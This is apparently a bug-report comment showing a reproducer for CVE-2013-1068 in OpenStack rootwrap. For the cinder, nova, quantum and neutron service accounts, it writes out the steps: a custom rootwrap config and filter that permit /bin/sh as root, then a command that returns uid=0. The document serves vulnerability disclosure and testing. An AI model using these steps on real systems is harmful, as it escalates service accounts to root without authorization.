Attached is a reproducer based on the bug description. This does not need a working OpenStack to demonstrate the vulnerability. All that is needed is installing *-common. E.g.:
* nova-common
* cinder-common
* quantum-common
* neutron-common

$ sudo -u cinder /tmp/CVE-2013-1068.sh # Ubuntu 13.04
Running as cinder
$ id
uid=110(cinder) gid=118(cinder) groups=118(cinder)
$ cat /tmp/cinder/my-rootwrap.conf
[DEFAULT]
filters_path=/tmp/cinder/my-filters.d
$ cat /tmp/cinder/my-filters.d/my.filters
[Filters]
my-shell: CommandFilter, /bin/sh, root
$ sudo -K
$ sudo -n cinder-rootwrap /tmp/cinder/my-rootwrap.conf sh -c id
uid=0(root) gid=0(root) groups=0(root)
FAIL

$ sudo -u nova /tmp/CVE-2013-1068.sh # Ubuntu 13.04
Running as nova
$ id
uid=112(nova) gid=120(nova) groups=120(nova),122(libvirtd)
$ cat /tmp/nova/my-rootwrap.conf
[DEFAULT]
filters_path=/tmp/nova/my-filters.d
$ cat /tmp/nova/my-filters.d/my.filters
[Filters]
my-shell: CommandFilter, /bin/sh, root
$ sudo -K
$ sudo -n nova-rootwrap /tmp/nova/my-rootwrap.conf sh -c id
uid=0(root) gid=0(root) groups=0(root)
FAIL

$ sudo -u quantum /tmp/CVE-2013-1068.sh # Ubuntu 13.04
Running as quantum
$ id
uid=117(quantum) gid=124(quantum) groups=124(quantum)
$ cat /tmp/quantum/my-rootwrap.conf
[DEFAULT]
filters_path=/tmp/quantum/my-filters.d
$ cat /tmp/quantum/my-filters.d/my.filters
[Filters]
my-shell: CommandFilter, /bin/sh, root
$ sudo -K
$ sudo -n quantum-rootwrap /tmp/quantum/my-rootwrap.conf sh -c id
uid=0(root) gid=0(root) groups=0(root)
FAIL

$ sudo -u neutron /tmp/CVE-2013-1068.sh # Ubuntu 13.10
Running as neutron
$ id
uid=117(neutron) gid=125(neutron) groups=125(neutron)
$ cat /tmp/neutron/my-rootwrap.conf
[DEFAULT]
filters_path=/tmp/neutron/my-filters.d
$ cat /tmp/neutron/my-filters.d/my.filters
[Filters]
my-shell: CommandFilter, /bin/sh, root
$ sudo -K
$ sudo -n neutron-rootwrap /tmp/neutron/my-rootwrap.conf sh -c id
uid=0(root) gid=0(root) groups=0(root)
FAIL